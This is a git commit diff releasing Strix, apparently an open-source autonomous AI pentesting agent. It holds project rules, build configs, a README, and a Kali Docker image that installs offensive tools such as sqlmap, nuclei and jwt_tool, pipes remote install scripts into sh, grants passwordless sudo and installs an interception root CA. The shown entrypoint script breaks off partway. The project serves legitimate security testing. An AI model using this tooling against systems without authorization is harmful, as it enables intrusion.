Open-source release for Alpha version

2025-08-08 20:36:44 -07:00
commit 81ac98e8b9
105 changed files with 22125 additions and 0 deletions
--- a/.cursor/rules/strix-project.mdc
+++ b/.cursor/rules/strix-project.mdc
@@ -0,0 +1,126 @@
 ---
 description:
 globs:
 alwaysApply: true
 ---
 # Strix Cybersecurity Agent - Project Rules
 ## Project Overview
 ### Goal and Purpose
 Strix is a sophisticated cybersecurity agent specialized in vulnerability scanning and security assessment. It provides:
 - Automated cybersecurity scans and assessments
 - Web application security testing
 - Infrastructure vulnerability analysis
 - Comprehensive security reporting
 - RESTful API for scan management
 - CLI interface for direct usage
 The project implements an AI-powered ReAct (Reasoning and Acting) framework for autonomous security testing.
 ## Project Structure
 ### High-Level Architecture
 ```
 strix-agent/
 ├── strix/                  # Core application package
 │   ├── agents/            # AI agent implementations
 │   ├── api/               # FastAPI web service
 │   ├── cli/               # Command-line interface
 │   ├── llm/               # Language model configurations
 │   └── tools/             # Security testing tools
 ├── tests/                 # Test suite
 ├── evaluation/            # Evaluation framework
 ├── containers/            # Docker configuration
 └── docs/                  # Documentation
 ```
 ### Low-Level Structure
 #### Core Components
 - **[strix/agents/StrixAgent/strix_agent.py](mdc:strix/agents/StrixAgent/strix_agent.py)** - Main cybersecurity agent
 - **[strix/agents/base_agent.py](mdc:strix/agents/base_agent.py)** - Base agent framework
 - **[strix/api/main.py](mdc:strix/api/main.py)** - FastAPI application entry point
 - **[strix/cli/main.py](mdc:strix/cli/main.py)** - CLI entry point
 - **[pyproject.toml](mdc:pyproject.toml)** - Project configuration and dependencies
 #### API Structure
 - **[strix/api/routers/](mdc:strix/api/routers)** - API endpoint definitions
 - **[strix/api/models/](mdc:strix/api/models)** - Pydantic data models
 - **[strix/api/services/](mdc:strix/api/services)** - Business logic services
 #### Security Tools
 - **[strix/tools/browser/](mdc:strix/tools/browser)** - Web browser automation
 - **[strix/tools/terminal/](mdc:strix/tools/terminal)** - Terminal command execution
 - **[strix/tools/python/](mdc:strix/tools/python)** - Python code execution
 - **[strix/tools/web_search/](mdc:strix/tools/web_search)** - Web reconnaissance
 - **[strix/tools/reporting/](mdc:strix/tools/reporting)** - Security report generation
 ## Development Guidelines
 ### Code Standards
 - **Simplicity**: Write simple, clean, and modular code
 - **Functionality**: Prefer functional programming patterns where appropriate
 - **Efficiency**: Optimize for performance without premature optimization
 - **No Bloat**: Avoid unnecessary complexity or over-engineering
 - **Minimal Comments**: Code should be self-documenting; use comments sparingly for complex business logic only
 ### Code Quality Requirements
 - All code MUST pass `make pre-commit` checks
 - All code MUST pass Ruff linting without warnings
 - All code MUST pass MyPy type checking without errors
 - Type hints are required for all function signatures
 - Follow the strict configuration in [pyproject.toml](mdc:pyproject.toml)
 ### Execution Environment
 - **ALWAYS** use `poetry run` for executing Python scripts and commands
 - **NEVER** run Python directly with `python` command
 - Use `poetry run strix-agent` for CLI operations
 - Use `poetry run uvicorn strix.api.main:app` for API server
 ### File Management Rules
 - **DO NOT** create or edit README.md or any .md documentation files unless explicitly requested
 - Focus on code implementation, not documentation
 - Keep docstrings concise and functional
 ### Testing and Quality Assurance
 - Run `make pre-commit` before any commits
 - Ensure all tests pass with `poetry run pytest`
 - Use `poetry run mypy .` for type checking
 - Use `poetry run ruff check .` for linting
 ### Dependencies
 - All dependencies managed through [pyproject.toml](mdc:pyproject.toml)
 - Use Poetry for dependency management
 - Pin versions for production dependencies
 - Keep dev dependencies in separate group
 ### Configuration
 - Application settings in [strix/api/core/config.py](mdc:strix/api/core/config.py)
 - LLM configuration in [strix/llm/config.py](mdc:strix/llm/config.py)
 - Agent system prompts in [strix/agents/StrixAgent/system_prompt.jinja](mdc:strix/agents/StrixAgent/system_prompt.jinja)
 ## Key Implementation Patterns
 ### Agent Framework
 - Inherit from BaseAgent for new agent implementations
 - Use ReAct pattern for reasoning and action loops
 - Implement tools through the registry system in [strix/tools/registry.py](mdc:strix/tools/registry.py)
 ### API Development
 - Use FastAPI with Pydantic models
 - Implement proper error handling and validation
 - Follow REST conventions for endpoints
 - Use Beanie ODM for MongoDB operations
 ### Security Tools
 - Implement tools as action classes with clear interfaces
 - Use async/await for I/O operations
 - Implement proper cleanup and resource management
 - Follow principle of least privilege
 ### Error Handling
 - Use structured exception handling
 - Provide meaningful error messages
 - Log errors appropriately without exposing sensitive information
 - Implement graceful degradation where possible
--- a/.github/screenshot.png
+++ b/.github/screenshot.png
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,98 @@
 # Python
 __pycache__/
 *.py[cod]
 *$py.class
 *.so
 .Python
 build/
 develop-eggs/
 dist/
 downloads/
 eggs/
 .eggs/
 lib/
 lib64/
 parts/
 sdist/
 var/
 wheels/
 *.egg-info/
 .installed.cfg
 *.egg
 # Virtual Environment
 venv/
 env/
 ENV/
 .env
 .venv
 pip-log.txt
 pip-delete-this-directory.txt
 # IDE
 .idea/
 .vscode/
 *.swp
 *.swo
 .DS_Store
 .project
 .pydevproject
 .settings/
 # Testing
 .tox/
 .coverage
 .coverage.*
 .cache
 nosetests.xml
 coverage.xml
 *.cover
 .hypothesis/
 .pytest_cache/
 htmlcov/
 # FastAPI
 .env.local
 .env.development.local
 .env.test.local
 .env.production.local
 # MongoDB
 data/
 mongod.log
 *.mongodb
 *.mongorc.js
 # LLM and ML related
 *.bin
 *.pt
 *.pth
 *.onnx
 *.h5
 *.hdf5
 *.pkl
 *.joblib
 wandb/
 runs/
 checkpoints/
 logs/
 tensorboard/
 # Agent execution traces
 agent_runs/
 # Misc
 *.log
 *.sqlite
 *.db
 .directory
 *.bak
 *.tmp
 *.temp
 .DS_Store
 Thumbs.db
 *.schema.graphql
 schema.graphql
 .opencode/
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -0,0 +1,62 @@
 repos:
  # Ruff for fast linting and formatting
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.11.13
    hooks:
      - id: ruff
        args: [--fix, --exit-non-zero-on-fix]
        name: ruff-lint
      - id: ruff-format
        name: ruff-format
  # MyPy for static type checking
  - repo: https://github.com/pre-commit/mirrors-mypy
    rev: v1.16.0
    hooks:
      - id: mypy
        additional_dependencies: [
          types-requests,
          types-python-dateutil,
          pydantic,
          fastapi,
        ]
        args: [--install-types, --non-interactive]
  # Built-in hooks for basic file checks
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v5.0.0
    hooks:
      - id: trailing-whitespace
      - id: end-of-file-fixer
      - id: check-toml
      - id: check-merge-conflict
      - id: check-added-large-files
      - id: debug-statements
      - id: check-case-conflict
      - id: check-docstring-first
  # Security checks with bandit
  - repo: https://github.com/PyCQA/bandit
    rev: 1.8.3
    hooks:
      - id: bandit
        args: [-c, pyproject.toml]
  # Additional Python code quality checks
  - repo: https://github.com/asottile/pyupgrade
    rev: v3.20.0
    hooks:
      - id: pyupgrade
        args: [--py312-plus]
 ci:
  autofix_commit_msg: |
    [pre-commit.ci] auto fixes from pre-commit.com hooks
    for more information, see https://pre-commit.ci
  autofix_prs: true
  autoupdate_branch: ""
  autoupdate_commit_msg: "[pre-commit.ci] pre-commit autoupdate"
  autoupdate_schedule: weekly
  skip: []
  submodules: false
--- a/201
+++ b/201
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding those notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. We also recommend that a
      file or class name and description of purpose be included on the
      same "printed page" as the copyright notice for easier
      identification within third-party archives.
   Copyright 2025 OmniSecure Inc.
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
--- a/90
+++ b/90
@@ -0,0 +1,90 @@
 .PHONY: help install dev-install format lint type-check test test-cov clean pre-commit setup-dev
 help:
 	@echo "Available commands:"
 	@echo "  setup-dev     - Install all development dependencies and setup pre-commit"
 	@echo "  install       - Install production dependencies"
 	@echo "  dev-install   - Install development dependencies"
 	@echo ""
 	@echo "Code Quality:"
 	@echo "  format        - Format code with ruff"
 	@echo "  lint          - Lint code with ruff and pylint"
 	@echo "  type-check    - Run type checking with mypy and pyright"
 	@echo "  security      - Run security checks with bandit"
 	@echo "  check-all     - Run all code quality checks"
 	@echo ""
 	@echo "Testing:"
 	@echo "  test          - Run tests with pytest"
 	@echo "  test-cov      - Run tests with coverage reporting"
 	@echo ""
 	@echo "Development:"
 	@echo "  pre-commit    - Run pre-commit hooks on all files"
 	@echo "  clean         - Clean up cache files and artifacts"
 install:
 	poetry install --only=main
 dev-install:
 	poetry install --with=dev
 setup-dev: dev-install
 	poetry run pre-commit install
 	@echo "✅ Development environment setup complete!"
 	@echo "Run 'make check-all' to verify everything works correctly."
 format:
 	@echo "🎨 Formatting code with ruff..."
 	poetry run ruff format .
 	@echo "✅ Code formatting complete!"
 lint:
 	@echo "🔍 Linting code with ruff..."
 	poetry run ruff check . --fix
 	@echo "📝 Running additional linting with pylint..."
 	poetry run pylint strix/ --score=no --reports=no
 	@echo "✅ Linting complete!"
 type-check:
 	@echo "🔍 Type checking with mypy..."
 	poetry run mypy strix/
 	@echo "🔍 Type checking with pyright..."
 	poetry run pyright strix/
 	@echo "✅ Type checking complete!"
 security:
 	@echo "🔒 Running security checks with bandit..."
 	poetry run bandit -r strix/ -c pyproject.toml
 	@echo "✅ Security checks complete!"
 check-all: format lint type-check security
 	@echo "✅ All code quality checks passed!"
 test:
 	@echo "🧪 Running tests..."
 	poetry run pytest -v
 	@echo "✅ Tests complete!"
 test-cov:
 	@echo "🧪 Running tests with coverage..."
 	poetry run pytest -v --cov=strix --cov-report=term-missing --cov-report=html
 	@echo "✅ Tests with coverage complete!"
 	@echo "📊 Coverage report generated in htmlcov/"
 pre-commit:
 	@echo "🔧 Running pre-commit hooks..."
 	poetry run pre-commit run --all-files
 	@echo "✅ Pre-commit hooks complete!"
 clean:
 	@echo "🧹 Cleaning up cache files..."
 	find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true
 	find . -type d -name ".pytest_cache" -exec rm -rf {} + 2>/dev/null || true
 	find . -type d -name ".mypy_cache" -exec rm -rf {} + 2>/dev/null || true
 	find . -type d -name ".ruff_cache" -exec rm -rf {} + 2>/dev/null || true
 	find . -type d -name "htmlcov" -exec rm -rf {} + 2>/dev/null || true
 	find . -name "*.pyc" -delete 2>/dev/null || true
 	find . -name ".coverage" -delete 2>/dev/null || true
 	@echo "✅ Cleanup complete!"
 dev: format lint type-check test
 	@echo "✅ Development cycle complete!"
--- a/README.md
+++ b/README.md
@@ -0,0 +1,157 @@
 <div align="center">
 # Strix
 ### Open-source AI hackers for your apps
 [![Apache 2.0](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](LICENSE)
 [![Vercel AI Accelerator 2025](https://img.shields.io/badge/Vercel%20AI-Accelerator%202025-000000?style=flat&logo=vercel)](https://vercel.com/ai-accelerator)
 [![Status: Alpha](https://img.shields.io/badge/status-alpha-orange.svg)](https://github.com/usestrix/strix)
 [![Discord](https://dcbadge.limes.pink/api/server/yduEyduBsp?style=flat)](https://discord.gg/yduEyduBsp)
 **⚡ Use it to hack your apps before the bad guys do ⚡**
 </div>
 <div align="center">
 <img src=".github/screenshot.png" alt="Strix Demo" width="800" style="border-radius: 16px; box-shadow: 0 20px 40px rgba(0, 0, 0, 0.3), 0 0 0 1px rgba(255, 255, 255, 0.1), inset 0 1px 0 rgba(255, 255, 255, 0.2); transform: perspective(1000px) rotateX(2deg); transition: transform 0.3s ease;">
 </div>
 ---
 ## 🚨 The AI Security Crisis
 Everyone's shipping code faster than ever. Cursor, Windsurf, and Claude made coding easy - but QA and security testing are now the real bottlenecks.
 > **Number of security vulnerabilities doubled post-AI.**
 Traditional security tools weren't designed for this. SAST was a temporary fix when manual pentesting cost $10k+ and took weeks. Now, Strix delivers real security testing rapidly.
 **The solution:** Enable developers to use AI coding at full speed, without compromising on security.
 ## 🦉 Strix Overview
 Strix are autonomous AI agents that act just like real hackers - they run your code dynamically, find vulnerabilities, and validate them through actual exploitation. Built for developers and security teams who need fast, accurate security testing without the overhead of manual pentesting or the false positives of static analysis tools.
 ### 🚀 Quick Start
 ```bash
 # Install
 pipx install strix-agent
 # Configure AI provider
 export STRIX_LLM="anthropic/claude-sonnet-4-20250514"
 export LLM_API_KEY="your-api-key"
 # Run security assessment
 strix --target ./app-directory
 ```
 ## Why Use Strix
 - **Full Hacker Arsenal** - All the tools a professional hacker needs, built into the agents
 - **Real Validation** - Dynamic testing and actual exploitation, thus much fewer false positives
 - **Developer-First** - Seamlessly integrates into existing development workflows
 - **Auto-Fix & Reporting** - Automated patching with detailed remediation and security reports
 ## ✨ Features
 ### 🛠️ Agentic Security Tools
 - **🔌 Full HTTP Proxy** - Full request/response manipulation and analysis
 - **🌐 Browser Automation** - Multi-tab browser for testing of XSS, CSRF, auth flows
 - **💻 Terminal Environments** - Interactive shells for command execution and testing
 - **🐍 Python Runtime** - Custom exploit development and validation
 - **🔍 Reconnaissance** - Automated OSINT and attack surface mapping
 - **📁 Code Analysis** - Static and dynamic analysis capabilities
 - **📝 Knowledge Management** - Structured findings and attack documentation
 ### 🎯 Comprehensive Vulnerability Detection
 - **Access Control** - IDOR, privilege escalation, auth bypass
 - **Injection Attacks** - SQL, NoSQL, command injection
 - **Server-Side** - SSRF, XXE, deserialization flaws
 - **Client-Side** - XSS, prototype pollution, DOM vulnerabilities
 - **Business Logic** - Race conditions, workflow manipulation
 - **Authentication** - JWT vulnerabilities, session management
 - **Infrastructure** - Misconfigurations, exposed services
 ### 🕸️ Graph of Agents
 - **Distributed Workflows** - Specialized agents for different attacks and assets
 - **Scalable Testing** - Parallel execution for fast comprehensive coverage
 - **Dynamic Coordination** - Agents collaborate and share discoveries
 ## 💻 Usage Examples
 ```bash
 # Local codebase analysis
 strix --target ./app-directory
 # Repository security review
 strix --target https://github.com/org/repo
 # Web application assessment
 strix --target https://your-app.com
 # Focused testing
 strix --target api.your-app.com --instruction "Prioritize authentication and authorization testing"
 ```
 ### ⚙️ Configuration
 ```bash
 # Required
 export STRIX_LLM="anthropic/claude-sonnet-4-20250514"
 export LLM_API_KEY="your-api-key"
 # Recommended
 export PERPLEXITY_API_KEY="your-api-key"
 ```
 [📚 View supported AI models](https://docs.litellm.ai/docs/providers)
 ## 🏆 Enterprise Platform
 Our managed platform provides:
 - **📈 Executive Dashboards**
 - **🧠 Custom Fine-Tuned Models**
 - **⚙️ CI/CD Integration**
 - **🔍 Large-Scale Scanning**
 - **🔌 Third-Party Integrations**
 - **🎯 Enterprise Support**
 [**Get Enterprise Demo →**](https://form.typeform.com/to/ljtvl6X0)
 ## 🔒 Security Architecture
 - **Container Isolation** - All testing in sandboxed Docker environments
 - **Local Processing** - Testing runs locally, no data sent to external services
 > [!NOTE]
 > Strix is currently in Alpha. Expect rapid updates and improvements.
 > [!WARNING]
 > Only test systems you own or have permission to test. You are responsible for using Strix ethically and legally.
 ## 🌟 Support the Project
 **Love Strix?** Give us a ⭐ on GitHub!
 ## 👥 Join Our Community
 Have questions? Found a bug? Want to contribute? **[Join our Discord!](https://discord.gg/yduEyduBsp)**
 ---
 <div align="center">
 ### About • Links
 **[OmniSecure Inc.](https://omnisecure.ai)** • Applied AI Research Lab
 [Discord Community](https://discord.gg/yduEyduBsp) • [Enterprise Solutions](https://form.typeform.com/to/ljtvl6X0) • [Report Issues](https://github.com/usestrix/strix/issues)
 </div>
--- a/containers/Dockerfile
+++ b/containers/Dockerfile
@@ -0,0 +1,190 @@
 FROM kalilinux/kali-rolling:latest
 LABEL description="AI Agent Penetration Testing Environment with Comprehensive Automated Tools"
 RUN apt-get update && \
    apt-get install -y kali-archive-keyring sudo && \
    apt-get update && \
    apt-get upgrade -y
 RUN useradd -m -s /bin/bash pentester && \
    usermod -aG sudo pentester && \
    echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
 RUN mkdir -p /home/pentester/configs \
             /home/pentester/wordlists \
             /home/pentester/output \
             /home/pentester/scripts \
             /home/pentester/tools \
             /app/runtime \
             /app/tools \
             /app/certs && \
    chown -R pentester:pentester /app/certs /home/pentester/tools
 RUN apt-get update && \
    apt-get install -y --no-install-recommends \
    wget curl git vim nano unzip tar \
    apt-transport-https ca-certificates gnupg lsb-release \
    build-essential software-properties-common \
    gcc libc6-dev pkg-config libpcap-dev libssl-dev \
    python3 python3-pip python3-dev python3-venv python3-setuptools \
    golang-go \
    net-tools dnsutils whois \
    jq parallel ripgrep grep \
    less man-db procps htop \
    iproute2 iputils-ping netcat-traditional \
    nmap ncat ndiff \
    sqlmap nuclei subfinder naabu ffuf \
    nodejs npm pipx \
    libcap2-bin \
    gdb \
    libnss3 libnspr4 libdbus-1-3 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 libatspi2.0-0 \
    libxcomposite1 libxdamage1 libxfixes3 libxrandr2 libgbm1 libxkbcommon0 libpango-1.0-0 libcairo2 libasound2 \
    fonts-unifont fonts-noto-color-emoji fonts-freefont-ttf fonts-dejavu-core ttf-bitstream-vera \
    libnss3-tools
 RUN setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip $(which nmap)
 USER pentester
 RUN openssl ecparam -name prime256v1 -genkey -noout -out /app/certs/ca.key && \
    openssl req -x509 -new -key /app/certs/ca.key \
    -out /app/certs/ca.crt \
    -days 3650 \
    -subj "/C=US/ST=CA/O=Security Testing/CN=Testing Root CA" \
    -addext "basicConstraints=critical,CA:TRUE" \
    -addext "keyUsage=critical,digitalSignature,keyEncipherment,keyCertSign" && \
    openssl pkcs12 -export \
    -out /app/certs/ca.p12 \
    -inkey /app/certs/ca.key \
    -in /app/certs/ca.crt \
    -passout pass:"" \
    -name "Testing Root CA" && \
    chmod 644 /app/certs/ca.crt && \
    chmod 600 /app/certs/ca.key && \
    chmod 600 /app/certs/ca.p12
 USER root
 RUN cp /app/certs/ca.crt /usr/local/share/ca-certificates/ca.crt && \
    update-ca-certificates
 RUN curl -sSL https://install.python-poetry.org | POETRY_HOME=/opt/poetry python3 - && \
    ln -s /opt/poetry/bin/poetry /usr/local/bin/poetry && \
    chmod +x /usr/local/bin/poetry && \
    python3 -m venv /app/venv && \
    chown -R pentester:pentester /app/venv /opt/poetry
 USER pentester
 WORKDIR /tmp
 RUN go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
    go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
    go install -v github.com/projectdiscovery/cvemap/cmd/vulnx@latest && \
    go install -v github.com/jaeles-project/gospider@latest && \
    go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
 RUN nuclei -update-templates
 RUN pipx install arjun && \
    pipx install dirsearch && \
    pipx inject dirsearch setuptools && \
    pipx install wafw00f
 ENV NPM_CONFIG_PREFIX=/home/pentester/.npm-global
 RUN mkdir -p /home/pentester/.npm-global
 RUN npm install -g retire@latest && \
    npm install -g eslint@latest && \
    npm install -g js-beautify@latest
 WORKDIR /home/pentester/tools
 RUN git clone https://github.com/aravind0x7/JS-Snooper.git && \
    chmod +x JS-Snooper/js_snooper.sh && \
    git clone https://github.com/xchopath/jsniper.sh.git && \
    chmod +x jsniper.sh/jsniper.sh && \
    git clone https://github.com/ticarpi/jwt_tool.git && \
    chmod +x jwt_tool/jwt_tool.py
 USER root
 RUN curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin
 RUN apt-get update && apt-get install -y zaproxy
 RUN curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
 RUN apt-get install -y wapiti
 USER pentester
 RUN pipx install semgrep && \
    pipx install bandit
 RUN npm install -g jshint
 USER root
 RUN apt-get autoremove -y && \
    apt-get autoclean && \
    rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
 ENV PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:/app/venv/bin:$PATH"
 ENV VIRTUAL_ENV="/app/venv"
 ENV POETRY_HOME="/opt/poetry"
 WORKDIR /app
 RUN ARCH=$(uname -m) && \
    if [ "$ARCH" = "x86_64" ]; then \
        CAIDO_ARCH="x86_64"; \
    elif [ "$ARCH" = "aarch64" ] || [ "$ARCH" = "arm64" ]; then \
        CAIDO_ARCH="aarch64"; \
    else \
        echo "Unsupported architecture: $ARCH" && exit 1; \
    fi && \
    wget -O caido-cli.tar.gz https://caido.download/releases/v0.48.0/caido-cli-v0.48.0-linux-${CAIDO_ARCH}.tar.gz && \
    tar -xzf caido-cli.tar.gz && \
    chmod +x caido-cli && \
    rm caido-cli.tar.gz && \
    mv caido-cli /usr/local/bin/
 ENV STRIX_SANDBOX_MODE=true
 ENV PYTHONPATH=/app
 ENV REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt
 ENV SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt
 RUN mkdir -p /shared_workspace /workspace && chown -R pentester:pentester /shared_workspace /workspace /app
 COPY pyproject.toml poetry.lock ./
 USER pentester
 RUN poetry install --no-root --without dev
 RUN poetry run playwright install chromium
 RUN /app/venv/bin/pip install -r /home/pentester/tools/jwt_tool/requirements.txt && \
    ln -s /home/pentester/tools/jwt_tool/jwt_tool.py /home/pentester/.local/bin/jwt_tool
 RUN echo "# Sandbox Environment" > README.md
 COPY strix/__init__.py strix/
 COPY strix/runtime/tool_server.py strix/runtime/__init__.py strix/runtime/runtime.py /app/strix/runtime/
 COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py /app/strix/tools/
 COPY strix/tools/browser/ /app/strix/tools/browser/
 COPY strix/tools/file_edit/ /app/strix/tools/file_edit/
 COPY strix/tools/notes/ /app/strix/tools/notes/
 COPY strix/tools/python/ /app/strix/tools/python/
 COPY strix/tools/terminal/ /app/strix/tools/terminal/
 COPY strix/tools/proxy/ /app/strix/tools/proxy/
 RUN echo 'export PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH"' >> /home/pentester/.bashrc && \
    echo 'export PATH="/home/pentester/go/bin:/home/pentester/.local/bin:/home/pentester/.npm-global/bin:$PATH"' >> /home/pentester/.profile
 USER root
 COPY containers/docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh
 RUN chmod +x /usr/local/bin/docker-entrypoint.sh
 USER pentester
 WORKDIR /workspace
 ENTRYPOINT ["docker-entrypoint.sh"]
--- a/containers/docker-entrypoint.sh
+++ b/containers/docker-entrypoint.sh
@@ -0,0 +1,128 @@
 #!/bin/bash
 set -e
 if [ -z "$CAIDO_PORT" ] || [ -z "$STRIX_TOOL_SERVER_PORT" ]; then
    echo "Error: CAIDO_PORT and STRIX_TOOL_SERVER_PORT must be set."
    exit 1
 fi
 caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
          --allow-guests \
          --no-logging \
          --no-open \
          --import-ca-cert /app/certs/ca.p12 \
          --import-ca-cert-pass "" > /dev/null 2>&1 &
 echo "Waiting for Caido API to be ready..."
 for i in {1..30}; do
  if curl -s -o /dev/null http://localhost:${CAIDO_PORT}/graphql; then
